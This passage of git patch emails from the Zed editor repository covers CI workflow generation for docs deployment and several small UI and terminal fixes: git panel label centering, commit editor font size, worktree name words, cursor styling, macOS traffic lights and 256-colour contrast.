PROJECT_NAME="{nightly_project_name}" + ;; + "preview") + SITE_URL="{preview_site_url}" + PROJECT_NAME="{preview_project_name}" + ;; + "stable") + SITE_URL="{stable_site_url}" + PROJECT_NAME="{stable_project_name}" + ;; + *) + echo "::error::Invalid docs channel '$CHANNEL'. Expected one of: nightly, preview, stable." + exit 1 + ;; + esac + + {{ + echo "channel=$CHANNEL" + echo "site_url=$SITE_URL" + echo "project_name=$PROJECT_NAME" + }} >> "$GITHUB_OUTPUT" + "#}, + nightly_site_url = DocsChannel::Nightly.site_url(), + preview_site_url = DocsChannel::Preview.site_url(), + stable_site_url = DocsChannel::Stable.site_url(), + nightly_project_name = DocsChannel::Nightly.project_name(), + preview_project_name = DocsChannel::Preview.project_name(), + stable_project_name = DocsChannel::Stable.project_name(), + )) + .id("resolve-channel") + .add_env(("CHANNEL", channel_expr.into())); + + let channel = StepOutput::new(&step, "channel"); + let site_url = StepOutput::new(&step, "site_url"); + let project_name = StepOutput::new(&step, "project_name"); + (step, channel, site_url, project_name) +} + +fn docs_job(channel_expr: impl Into, checkout_ref: Option) -> NamedJob { + let (resolve_step, channel, site_url, project_name) = resolve_channel_step(channel_expr); + + NamedJob { + name: "deploy_docs".to_owned(), + job: docs_deploy_steps( + docs_build_steps( + release_job(&[]) + .cond(Expression::new( + "github.repository_owner == 'zed-industries'", + )) + .name("Build and Deploy Docs") + .add_step(resolve_step), + checkout_ref, + channel.to_string(), + site_url.to_string(), + ), + &project_name, + ), + } +} + +pub(crate) fn deploy_docs_workflow_call( + channel: impl Into, + checkout_ref: impl Into, +) -> NamedJob { + let job = Job::default() + .with_repository_owner_guard() + .permissions(Permissions::default().contents(Level::Read)) + .uses( + "zed-industries", + "zed", + ".github/workflows/deploy_docs.yml", + "main", + ) + .with( + Input::default() + .add("channel", channel.into()) + .add("checkout_ref", checkout_ref.into()), + ) + .secrets(indexmap::IndexMap::from([ + ( + "DOCS_AMPLITUDE_API_KEY".to_owned(), + vars::DOCS_AMPLITUDE_API_KEY.to_owned(), + ), + ( + "CLOUDFLARE_API_TOKEN".to_owned(), + vars::CLOUDFLARE_API_TOKEN.to_owned(), + ), + ( + "CLOUDFLARE_ACCOUNT_ID".to_owned(), + vars::CLOUDFLARE_ACCOUNT_ID.to_owned(), + ), + ])); + + NamedJob { + name: "deploy_docs".to_owned(), + job, + } +} + +pub(crate) fn deploy_docs_job( + channel_input: &WorkflowInput, + checkout_ref_input: &WorkflowInput, +) -> NamedJob { + docs_job( + channel_input.to_string(), + Some(format!( + "${{{{ {} != '' && {} || github.sha }}}}", + checkout_ref_input.expr(), + checkout_ref_input.expr() + )), + ) +} + +pub(crate) fn deploy_docs() -> Workflow { + let channel = WorkflowInput::string("channel", Some(String::new())) + .description("Docs channel to deploy: nightly, preview, or stable"); + let checkout_ref = WorkflowInput::string("checkout_ref", Some(String::new())) + .description("Git ref to checkout and deploy. Defaults to event SHA when omitted."); + let deploy_docs = deploy_docs_job(&channel, &checkout_ref); + + named::workflow() + .add_event( + Event::default().workflow_dispatch( + WorkflowDispatch::default() + .add_input(channel.name, channel.input()) + .add_input(checkout_ref.name, checkout_ref.input()), + ), + ) + .add_event( + Event::default().workflow_call( + WorkflowCall::default() + .add_input(channel.name, channel.call_input()) + .add_input(checkout_ref.name, checkout_ref.call_input()) + .secrets([ + ( + "DOCS_AMPLITUDE_API_KEY".to_owned(), + WorkflowCallSecret { + description: "DOCS_AMPLITUDE_API_KEY".to_owned(), + required: true, + }, + ), + ( + "CLOUDFLARE_API_TOKEN".to_owned(), + WorkflowCallSecret { + description: "CLOUDFLARE_API_TOKEN".to_owned(), + required: true, + }, + ), + ( + "CLOUDFLARE_ACCOUNT_ID".to_owned(), + WorkflowCallSecret { + description: "CLOUDFLARE_ACCOUNT_ID".to_owned(), + required: true, + }, + ), + ]), + ), + ) + .add_job(deploy_docs.name, deploy_docs.job) +} + +pub(crate) fn deploy_nightly_docs() -> Workflow { + let deploy_docs = deploy_docs_workflow_call("nightly", "${{ github.sha }}"); + + named::workflow() + .name("deploy_nightly_docs") + .add_event(Event::default().push(Push::default().add_branch("main"))) + .add_job(deploy_docs.name, deploy_docs.job) +} diff --git a/tooling/xtask/src/tasks/workflows/run_tests.rs b/tooling/xtask/src/tasks/workflows/run_tests.rs index 644c033f681f51..0bbff446a750d2 100644 --- a/tooling/xtask/src/tasks/workflows/run_tests.rs +++ b/tooling/xtask/src/tasks/workflows/run_tests.rs @@ -15,6 +15,7 @@ use crate::tasks::workflows::{ }; use super::{ + deploy_docs, runners::{self, Arch, Platform}, steps::{self, FluentBuilder, NamedJob, named, release_job}, }; @@ -82,7 +83,7 @@ pub(crate) fn run_tests() -> Workflow { .then(check_dependencies()), // could be more specific here? should_check_docs .and_not_in_merge_queue() - .then(check_docs()), + .then(deploy_docs::check_docs()), should_check_licences .and_not_in_merge_queue() .then(check_licenses()), @@ -713,54 +714,6 @@ fn check_licenses() -> NamedJob { ) } -fn check_docs() -> NamedJob { - fn lychee_link_check(dir: &str) -> Step { - named::uses( - "lycheeverse", - "lychee-action", - "82202e5e9c2f4ef1a55a3d02563e1cb6041e5332", - ) // v2.4.1 - .add_with(("args", format!("--no-progress --exclude '^http' '{dir}'"))) - .add_with(("fail", true)) - .add_with(("jobSummary", false)) - } - - fn install_mdbook() -> Step { - named::uses( - "peaceiris", - "actions-mdbook", - "ee69d230fe19748b7abf22df32acaa93833fad08", // v2 - ) - .with(("mdbook-version", "0.4.37")) - } - - fn build_docs() -> Step { - named::bash(indoc::indoc! {r#" - mkdir -p target/deploy - mdbook build ./docs --dest-dir=../target/deploy/docs/ - "#}) - } - - named::job(use_clang( - release_job(&[]) - .runs_on(runners::LINUX_LARGE) - .add_step(steps::checkout_repo()) - .add_step(steps::setup_cargo_config(Platform::Linux)) - // todo(ci): un-inline build_docs/action.yml here - .add_step(steps::cache_rust_dependencies_namespace()) - .add_step( - lychee_link_check("./docs/src/**/*"), // check markdown links - ) - .map(steps::install_linux_dependencies) - .add_step(steps::script("./script/generate-action-metadata")) - .add_step(install_mdbook()) - .add_step(build_docs()) - .add_step( - lychee_link_check("target/deploy/docs"), // check links in generated html - ), - )) -} - pub(crate) fn check_scripts() -> NamedJob { fn download_actionlint() -> Step { named::bash( diff --git a/tooling/xtask/src/tasks/workflows/steps.rs b/tooling/xtask/src/tasks/workflows/steps.rs index df0f6aababdedd..2e13427d603ac4 100644 --- a/tooling/xtask/src/tasks/workflows/steps.rs +++ b/tooling/xtask/src/tasks/workflows/steps.rs @@ -137,6 +137,8 @@ impl From for Step { } } +impl FluentBuilder for CheckoutStep {} + pub fn checkout_repo() -> CheckoutStep { CheckoutStep::default() } diff --git a/tooling/xtask/src/tasks/workflows/vars.rs b/tooling/xtask/src/tasks/workflows/vars.rs index 87010b9b79a749..6f6fca5e2ab719 100644 --- a/tooling/xtask/src/tasks/workflows/vars.rs +++ b/tooling/xtask/src/tasks/workflows/vars.rs @@ -51,6 +51,9 @@ secret!(SLACK_WEBHOOK_WORKFLOW_FAILURES); secret!(R2_ACCOUNT_ID); secret!(R2_ACCESS_KEY_ID); secret!(R2_SECRET_ACCESS_KEY); +secret!(CLOUDFLARE_API_TOKEN); +secret!(CLOUDFLARE_ACCOUNT_ID); +secret!(DOCS_AMPLITUDE_API_KEY); // todo(ci) make these secrets too... var!(AZURE_SIGNING_ACCOUNT_NAME); From 514fe331968ec6fbb70ecc0ecee483fad6c97360 Mon Sep 17 00:00:00 2001 From: Dong Date: Thu, 30 Apr 2026 19:30:06 +0800 Subject: [PATCH 114/231] git_panel: Fix empty state label not align to center (#55235) When the git panel is too narrow for "No changes to commit" or "No Git Repositories" to fit on a single line, the wrapped lines were start-aligned while the button below remained centered, breaking the visual stack. This wraps each label in a stretched, text-centered `div`, matching the pattern already used by `render_unsafe_repo_ui` in the same file. The bare string is kept (no `Label`) so the parent `v_flex`'s `text_color(Color::Placeholder)` continues to apply unchanged. ### Repository detect | As-is | To-be | | --- | --- | | | | ### Repository not detect | As-is | To-be | | --- | --- | | | | Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes N/A Release Notes: - git_panel: Fixed empty state labels in the git panel becoming left-aligned when wrapped to multiple lines --- crates/git_ui/src/git_panel.rs | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index f0900b56bccad1..d2cc266e0f2c80 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -4824,7 +4824,13 @@ impl GitPanel { } fn render_no_changes_ui(&self, cx: &Context) -> Vec { - let mut elements: Vec = vec!["No changes to commit".into_any_element()]; + let mut elements: Vec = vec![ + div() + .self_stretch() + .text_center() + .child("No changes to commit") + .into_any_element(), + ]; if self.changes_count == 0 && !self.is_on_main_branch(cx) { elements.push( @@ -4906,7 +4912,11 @@ impl GitPanel { let worktree_count = self.project.read(cx).visible_worktrees(cx).count(); if worktree_count > 0 && self.active_repository.is_none() { vec![ - "No Git Repositories".into_any_element(), + div() + .self_stretch() + .text_center() + .child("No Git Repositories") + .into_any_element(), panel_filled_button("Initialize Repository") .tooltip(Tooltip::for_action_title_in( "git init", From c52d559ddf86c06a753be15190fe51b238e2ed00 Mon Sep 17 00:00:00 2001 From: Mikhail Pertsev Date: Thu, 30 Apr 2026 13:33:31 +0200 Subject: [PATCH 115/231] git_ui: Fix the Git panel commit message editor ignoring `buffer_font_size` (#55233) Closes #55227 Updates the Git panel commit message editor to respect the configured `buffer_font_size` when using buffer/editor typography. This keeps the commit box visually consistent with other editor text while preserving the existing UI-font sizing path for non-buffer panel editor styles. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed the Git panel commit message editor ignoring `buffer_font_size` --- crates/git_ui/src/git_panel.rs | 69 ++++++++++++++++++++++------------ 1 file changed, 46 insertions(+), 23 deletions(-) diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index d2cc266e0f2c80..d4cf03c853848a 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -37,9 +37,9 @@ use git::{ StashApply, StashPop, ToggleFillCommitEditor, TrashUntrackedFiles, UnstageAll, }; use gpui::{ - Action, Anchor, AsyncApp, AsyncWindowContext, Bounds, ClickEvent, DismissEvent, Empty, Entity, - EventEmitter, FocusHandle, Focusable, KeyContext, MouseButton, MouseDownEvent, Point, - PromptLevel, ScrollStrategy, Subscription, Task, TextStyle, UniformListScrollHandle, + AbsoluteLength, Action, Anchor, AsyncApp, AsyncWindowContext, Bounds, ClickEvent, DismissEvent, + Empty, Entity, EventEmitter, FocusHandle, Focusable, KeyContext, MouseButton, MouseDownEvent, + Point, PromptLevel, ScrollStrategy, Subscription, Task, TextStyle, UniformListScrollHandle, WeakEntity, actions, anchored, deferred, point, size, uniform_list, }; use itertools::Itertools; @@ -6158,25 +6158,27 @@ pub fn panel_editor_container(_window: &mut Window, cx: &mut App) -> Div { pub(crate) fn panel_editor_style(monospace: bool, window: &Window, cx: &App) -> EditorStyle { let settings = ThemeSettings::get_global(cx); - let font_size = TextSize::Small.rems(cx).to_pixels(window.rem_size()); - - let (font_family, font_fallbacks, font_features, font_weight, line_height) = if monospace { - ( - settings.buffer_font.family.clone(), - settings.buffer_font.fallbacks.clone(), - settings.buffer_font.features.clone(), - settings.buffer_font.weight, - font_size * settings.buffer_line_height.value(), - ) - } else { - ( - settings.ui_font.family.clone(), - settings.ui_font.fallbacks.clone(), - settings.ui_font.features.clone(), - settings.ui_font.weight, - window.line_height(), - ) - }; + let (font_family, font_fallbacks, font_features, font_size, font_weight, line_height) = + if monospace { + let font_size = settings.buffer_font_size(cx); + ( + settings.buffer_font.family.clone(), + settings.buffer_font.fallbacks.clone(), + settings.buffer_font.features.clone(), + AbsoluteLength::from(font_size), + settings.buffer_font.weight, + font_size * settings.buffer_line_height.value(), + ) + } else { + ( + settings.ui_font.family.clone(), + settings.ui_font.fallbacks.clone(), + settings.ui_font.features.clone(), + AbsoluteLength::from(TextSize::Small.rems(cx)), + settings.ui_font.weight, + window.line_height(), + ) + }; EditorStyle { background: cx.theme().colors().editor_background, @@ -6186,7 +6188,7 @@ pub(crate) fn panel_editor_style(monospace: bool, window: &Window, cx: &App) -> font_family, font_fallbacks, font_features, - font_size: TextSize::Small.rems(cx).into(), + font_size, font_weight, line_height: line_height.into(), ..Default::default() @@ -8406,4 +8408,25 @@ mod tests { )); }); } + + #[gpui::test] + async fn test_panel_editor_style_uses_buffer_font_size(cx: &mut TestAppContext) { + init_test(cx); + + cx.update(|cx| { + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |settings| { + settings.theme.buffer_font_size = Some(20.0.into()); + }); + }); + }); + + cx.add_window(|window, cx| { + let style = panel_editor_style(true, window, cx); + + assert_eq!(style.text.font_size.to_pixels(window.rem_size()), px(20.0)); + + Editor::single_line(window, cx) + }); + } } From f73bc562e2a8c76da3faf08a3b09bd0abd56c28e Mon Sep 17 00:00:00 2001 From: Cameron Mcloughlin Date: Thu, 30 Apr 2026 12:39:06 +0100 Subject: [PATCH 116/231] git: Remove potentially confusing words from worktree names (#55314) Changes the list of words used when generating random worktree names to avoid anything even tangentially related to software engineering. Release Notes: - N/A or Added/Fixed/Improved ... --- crates/git_ui/src/worktree_names.rs | 92 ++++++++++++++--------------- 1 file changed, 46 insertions(+), 46 deletions(-) diff --git a/crates/git_ui/src/worktree_names.rs b/crates/git_ui/src/worktree_names.rs index 68be75cb4c66ef..ad09907107bfd6 100644 --- a/crates/git_ui/src/worktree_names.rs +++ b/crates/git_ui/src/worktree_names.rs @@ -2,59 +2,59 @@ use collections::HashSet; use rand::Rng; const ADJECTIVES: &[&str] = &[ - "able", "agate", "agile", "alpine", "amber", "ample", "aqua", "arctic", "arid", "astral", - "autumn", "avid", "azure", "balmy", "birch", "bold", "boreal", "brave", "breezy", "brief", - "bright", "brisk", "broad", "bronze", "calm", "cerith", "civil", "clean", "clear", "clever", - "cobalt", "cool", "copper", "coral", "cozy", "crisp", "cubic", "cyan", "deft", "dense", "dewy", - "direct", "dusky", "dusty", "eager", "early", "earnest", "elder", "elfin", "equal", "even", - "exact", "faint", "fair", "fast", "fawn", "ferny", "fiery", "fine", "firm", "fleet", "floral", - "focal", "fond", "frank", "fresh", "frosty", "full", "gentle", "gilded", "glacial", "glad", - "glossy", "golden", "grand", "green", "gusty", "hale", "happy", "hardy", "hazel", "hearty", - "hilly", "humble", "hushed", "icy", "ideal", "inner", "iron", "ivory", "jade", "jovial", - "keen", "kind", "lapis", "leafy", "level", "light", "lilac", "limber", "lively", "local", - "lofty", "lucid", "lunar", "major", "maple", "mellow", "merry", "mild", "milky", "misty", - "modal", "modest", "mossy", "muted", "native", "naval", "neat", "nimble", "noble", "north", - "novel", "oaken", "ochre", "olive", "onyx", "opal", "open", "optic", "outer", "owed", "ozone", - "pale", "pastel", "pearl", "pecan", "peppy", "pilot", "placid", "plain", "plum", "plush", - "poised", "polar", "polished", "poplar", "prime", "proof", "proud", "pure", "quartz", "quick", - "quiet", "rapid", "raspy", "ready", "regal", "rooted", "rosy", "round", "royal", "ruby", - "ruddy", "russet", "rustic", "sage", "salty", "sandy", "satin", "scenic", "sedge", "serene", - "sharp", "sheer", "silky", "silver", "sleek", "smart", "smooth", "snowy", "solar", "solid", - "south", "spry", "stark", "steady", "steel", "steep", "still", "stoic", "stony", "stout", - "sturdy", "suede", "sunny", "supple", "sure", "swift", "tall", "tawny", "teal", "terse", - "thick", "tidal", "tidy", "timber", "topaz", "total", "trim", "tropic", "true", "tulip", - "upper", "urban", "valid", "vast", "velvet", "verde", "vivid", "vocal", "warm", "waxen", - "west", "whole", "wide", "wild", "wise", "witty", "woven", "young", "zealous", "zephyr", - "zesty", "zinc", + "able", "agate", "airy", "alpine", "amber", "ample", "aqua", "arctic", "arid", "ashen", + "astral", "autumn", "avid", "balmy", "birch", "bold", "boreal", "brave", "breezy", "brief", + "bright", "brisk", "broad", "bronze", "calm", "cerith", "cheery", "civil", "clean", "clear", + "clever", "cobalt", "cool", "copper", "coral", "cozy", "crisp", "cubic", "cyan", "deft", + "dense", "dewy", "direct", "dusky", "dusty", "early", "earnest", "earthy", "elder", "elfin", + "equal", "even", "exact", "faint", "fair", "fast", "fawn", "ferny", "fiery", "fine", "firm", + "fleet", "floral", "focal", "fond", "frank", "fresh", "frosty", "full", "gentle", "gilded", + "glacial", "glad", "glossy", "golden", "grand", "green", "gusty", "hale", "happy", "hardy", + "hazel", "hearty", "hilly", "humble", "hushed", "icy", "ideal", "inky", "iron", "ivory", + "jade", "jovial", "keen", "kind", "lapis", "leafy", "level", "light", "lilac", "limber", + "lively", "lofty", "loyal", "lucid", "lunar", "major", "maple", "marshy", "mellow", "merry", + "mild", "milky", "misty", "modest", "mossy", "muted", "narrow", "naval", "neat", "nimble", + "noble", "north", "novel", "oaken", "ochre", "olive", "onyx", "opal", "optic", "ornate", + "oval", "owed", "ozone", "pale", "pastel", "pearl", "pecan", "peppy", "pilot", "placid", + "plain", "plucky", "plum", "plush", "poised", "polar", "polished", "poplar", "prime", "proof", + "proud", "quartz", "quick", "quiet", "rainy", "rapid", "raspy", "ready", "regal", "roomy", + "rooted", "rosy", "round", "royal", "ruddy", "russet", "sage", "salty", "sandy", "satin", + "scenic", "sedge", "serene", "sheer", "silky", "silver", "sleek", "smart", "smooth", "snowy", + "snug", "solar", "solid", "south", "spry", "stark", "steady", "steel", "steep", "still", + "stocky", "stoic", "stony", "stout", "sturdy", "suede", "sunny", "supple", "sure", "tall", + "tangy", "tawny", "teal", "terse", "thick", "tidal", "tidy", "timber", "topaz", "total", + "trim", "tropic", "tulip", "upper", "urban", "vast", "velvet", "verde", "vivid", "vocal", + "warm", "waxen", "west", "whole", "wide", "wild", "wise", "witty", "woven", "young", "zealous", + "zephyr", "zesty", "zinc", ]; const NOUNS: &[&str] = &[ - "anchor", "anvil", "arbor", "arch", "arrow", "atlas", "badge", "badger", "basin", "bay", - "beacon", "beam", "bell", "birch", "blade", "bloom", "bluff", "bolt", "bower", "breeze", - "bridge", "brook", "bunting", "cabin", "cairn", "canyon", "cape", "cedar", "chasm", "cliff", - "cloud", "clover", "coast", "cobble", "colt", "comet", "condor", "coral", "cove", "crane", - "crater", "creek", "crest", "curlew", "cypress", "dale", "dawn", "delta", "den", "dove", - "drake", "drift", "drum", "dune", "dusk", "eagle", "echo", "egret", "elk", "elm", "ember", - "falcon", "fawn", "fern", "ferry", "field", "finch", "fjord", "flame", "flint", "flower", - "forge", "fossil", "fox", "frost", "gale", "garnet", "gate", "gazelle", "geyser", "glade", + "acorn", "almond", "anvil", "apricot", "arbor", "atlas", "badge", "badger", "basin", "bay", + "beacon", "beam", "bell", "birch", "blade", "bloom", "bluff", "bobcat", "bolt", "breeze", + "bridge", "brook", "bunting", "burrow", "cabin", "cairn", "canyon", "cape", "cedar", "chasm", + "cliff", "clover", "coast", "cobble", "colt", "comet", "conch", "condor", "coral", "cove", + "coyote", "crane", "crater", "creek", "crest", "curlew", "daisy", "dale", "dawn", "den", + "dove", "drake", "drift", "drum", "dune", "dusk", "eagle", "eel", "egret", "elk", "emu", + "falcon", "fawn", "fennel", "fern", "ferret", "ferry", "fig", "finch", "fjord", "flicker", + "flint", "flower", "fox", "frost", "gale", "garnet", "gate", "gazelle", "geyser", "glade", "glen", "gorge", "granite", "grove", "gull", "harbor", "hare", "haven", "hawk", "hazel", "heath", "hedge", "heron", "hill", "hollow", "horizon", "ibis", "inlet", "isle", "ivy", - "jackal", "jasper", "juniper", "kestrel", "kinglet", "knoll", "lagoon", "lake", "lantern", - "larch", "lark", "laurel", "lava", "leaf", "ledge", "lily", "linden", "lodge", "loft", "lotus", - "lynx", "mantle", "maple", "marble", "marsh", "marten", "meadow", "merlin", "mesa", "mill", - "mint", "moon", "moose", "moss", "newt", "north", "nutmeg", "oak", "oasis", "obsidian", - "orbit", "orchid", "oriole", "osprey", "otter", "owl", "palm", "panther", "pass", "path", - "peak", "pebble", "pelican", "peony", "perch", "pier", "pine", "plover", "plume", "pond", - "poppy", "prairie", "prism", "puma", "quail", "quarry", "quartz", "rain", "rampart", "range", - "raven", "ravine", "reed", "reef", "ridge", "river", "robin", "rowan", "sage", "salmon", - "sequoia", "shore", "shrike", "sigma", "sky", "slate", "slope", "snow", "spark", "sparrow", - "spider", "spruce", "stag", "star", "stone", "stork", "storm", "stream", "summit", "swift", - "sycamore", "tern", "terrace", "thistle", "thorn", "thrush", "tide", "timber", "torch", - "tower", "trail", "trout", "tulip", "tundra", "vale", "valley", "veranda", "viper", "vista", - "vole", "walrus", "warbler", "willow", "wolf", "wren", "yew", "zenith", + "jackal", "jasper", "juniper", "kinglet", "kitten", "knoll", "lagoon", "lake", "lantern", + "larch", "lark", "laurel", "lava", "leaf", "ledge", "lily", "linden", "lodge", "loft", "loon", + "lotus", "mantle", "maple", "marble", "marsh", "marten", "meadow", "merlin", "mill", "minnow", + "moon", "moose", "moss", "moth", "newt", "north", "nutmeg", "oak", "oasis", "obsidian", + "orbit", "orchid", "oriole", "osprey", "otter", "owl", "palm", "panther", "pass", "peach", + "peak", "pebble", "pelican", "peony", "perch", "pier", "pike", "pine", "plover", "plume", + "pond", "poppy", "prairie", "prism", "quail", "quarry", "quartz", "rain", "rampart", "raven", + "ravine", "reed", "reef", "ridge", "river", "robin", "rook", "rowan", "sage", "salmon", + "sequoia", "shore", "shrew", "shrike", "sigma", "sky", "slope", "snipe", "snow", "sparrow", + "spruce", "stag", "star", "starling", "stoat", "stone", "stork", "storm", "strand", "summit", + "sycamore", "tern", "terrace", "thistle", "thorn", "thrush", "tide", "timber", "toucan", + "trail", "trout", "tulip", "tundra", "turtle", "vale", "valley", "veranda", "violet", "viper", + "vole", "walrus", "warbler", "willow", "wolf", "wren", "yak", "zenith", ]; -/// Generates a worktree name in `"adjective-noun"` format (e.g. `"swift-falcon"`). +/// Generates a worktree name in `"adjective-noun"` format (e.g. `"calm-river"`). /// /// Tries up to 10 random combinations, skipping any name that already appears /// in `existing_names`. Returns `None` if no unused name is found. From e0b732ee56301f12b24fa25fc40b631ca1d6466a Mon Sep 17 00:00:00 2001 From: Jake Norris <102190210+jakenorris1124@users.noreply.github.com> Date: Thu, 30 Apr 2026 07:41:26 -0400 Subject: [PATCH 117/231] git_graph: Fix mouse cursor not switching to cursor pointer in git graph (#55247) This PR calls 'cursor_pointer()' on the appropriate UI elements. It is a very small change, but it is my first time contributing, so please let me know if I have made any mistakes. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #55218 Release Notes: - Fixed the mouse cursor not switching to cursor pointer when hovering commit rows in the git graph --- crates/git_graph/src/git_graph.rs | 2 ++ 1 file changed, 2 insertions(+) diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index a69da25daa9018..e98e635c1411f3 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -2811,6 +2811,7 @@ impl Render for GitGraph { .id("graph-canvas") .size_full() .overflow_hidden() + .cursor_pointer() .child( div() .size_full() @@ -2846,6 +2847,7 @@ impl Render for GitGraph { }; row.h(row_height) + .cursor_pointer() .when(is_selected, |row| row.bg(selected_bg)) .when(is_hovered && !is_selected, |row| row.bg(hover_bg)) .on_hover(move |&is_hovered, _, cx| { From ebe1b2283c3b9abfc470e63ac101c6b96cb31280 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Thu, 30 Apr 2026 15:48:00 +0200 Subject: [PATCH 118/231] Fix macOS traffic light position when performing a project search (#55310) Regression introduced in #48029, applying the same workaround here that we seem to use for `setDocumentEdited` Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - (Preview only) Fixed an issue on macOS where the traffic light position would be wrong when opening the project search --- crates/gpui_macos/src/window.rs | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/crates/gpui_macos/src/window.rs b/crates/gpui_macos/src/window.rs index b8dafbbc90bdc5..c4c47c4f542468 100644 --- a/crates/gpui_macos/src/window.rs +++ b/crates/gpui_macos/src/window.rs @@ -1482,6 +1482,10 @@ impl PlatformWindow for MacWindow { let filename = path.map_or(ns_string(""), |p| ns_string(&p.to_string_lossy())); let _: () = msg_send![window, setRepresentedFilename: filename]; } + + // Changing the document path state resets the traffic light position, + // so we have to move it again. + self.0.lock().move_traffic_light(); } fn show_character_palette(&self) { From 5d263c142e78cd9707735ea53f8df43f7c310f32 Mon Sep 17 00:00:00 2001 From: Malix - Alix Brunet Date: Thu, 30 Apr 2026 15:49:56 +0200 Subject: [PATCH 119/231] Update feature request link (#55258) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability --- .github/ISSUE_TEMPLATE/config.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml index 9bf14ce72d5feb..628579b2340d8a 100644 --- a/.github/ISSUE_TEMPLATE/config.yml +++ b/.github/ISSUE_TEMPLATE/config.yml @@ -2,7 +2,7 @@ blank_issues_enabled: false contact_links: - name: Feature request - url: https://github.com/zed-industries/zed/discussions/new/choose + url: https://github.com/zed-industries/zed/discussions/new?category=feature-requests about: To request a feature, open a new discussion under one of the appropriate categories. - name: Our Discord community url: https://discord.com/invite/zedindustries From 1f491524098a8ff7a9b9dae2c8a2b1fb575bd996 Mon Sep 17 00:00:00 2001 From: Finn Eitreim <48069764+feitreim@users.noreply.github.com> Date: Thu, 30 Apr 2026 10:01:32 -0400 Subject: [PATCH 120/231] terminal: Fix 8 bit colors (#54565) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Right now the terminal rendering code applies a minimum contrast value (which is good, and for accessibility) to colors that appear, there was already an exemption from this for 24bit color specification, because the application explicitly asked for that color, so it should be rendered that color. My change changes that exemption to also include ansi colors 16-255, because these are also set explicitly, the normal, non-exempt case is now the default ansi colors, 0-15, these are set by the theme and are usually specified as just 'red' or 'green', hence the importance of the min contrast. Heres what the gradient ramp from the original issue looks like now: Screenshot 2026-04-22 at 6 45 43 PM This matches ghostty and VSCodium from the original issue. test prevents regressions but idk, maybe not nessecary. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54396 Release Notes: - terminal: Improved 256 color ansi rendering --- crates/terminal_view/src/terminal_element.rs | 69 ++++++++++++++++++-- 1 file changed, 65 insertions(+), 4 deletions(-) diff --git a/crates/terminal_view/src/terminal_element.rs b/crates/terminal_view/src/terminal_element.rs index 8f46e8f9b27af4..99918d4784834a 100644 --- a/crates/terminal_view/src/terminal_element.rs +++ b/crates/terminal_view/src/terminal_element.rs @@ -538,6 +538,20 @@ impl TerminalElement { ) } + /// Whether the application explicitly picked this foreground color and does not + /// want it adjusted for contrast: 24-bit true color (`\e[38;2;R;G;Bm`) or a + /// specific entry in the 256-color palette (`\e[38;5;Nm`) where N >= 16 (the + /// 6x6x6 cube at 16..=231 and the 24-step grayscale ramp at 232..=255). + /// Indices 0..=15 still go through contrast adjustment since those map to + /// theme-defined ANSI colors that can clash with the theme background. + fn is_app_chosen_exact_color(fg: &terminal::alacritty_terminal::vte::ansi::Color) -> bool { + matches!( + fg, + terminal::alacritty_terminal::vte::ansi::Color::Spec(_) + | terminal::alacritty_terminal::vte::ansi::Color::Indexed(16..=255) + ) + } + /// Converts the Alacritty cell styles to GPUI text styles and background color. fn cell_style( indexed: &IndexedCell, @@ -549,13 +563,11 @@ impl TerminalElement { minimum_contrast: f32, ) -> TextRun { let flags = indexed.cell.flags; - let is_true_color = matches!(fg, terminal::alacritty_terminal::vte::ansi::Color::Spec(_)); + let skip_contrast = Self::is_app_chosen_exact_color(&fg); let mut fg = convert_color(&fg, colors); let bg = convert_color(&bg, colors); - // Skip contrast adjustment for true-color (24-bit RGB) foregrounds — the - // application chose that exact color. Also skip for decorative characters. - if !is_true_color && !Self::is_decorative_character(indexed.c) { + if !skip_contrast && !Self::is_decorative_character(indexed.c) { fg = ensure_minimum_contrast(fg, bg, minimum_contrast); } @@ -1819,6 +1831,55 @@ mod tests { assert!(!TerminalElement::is_decorative_character(' ')); } + #[test] + fn test_is_app_chosen_exact_color() { + use terminal::alacritty_terminal::vte::ansi::{Color, NamedColor, Rgb}; + + // Indices 0..=15 are theme-overridable ANSI 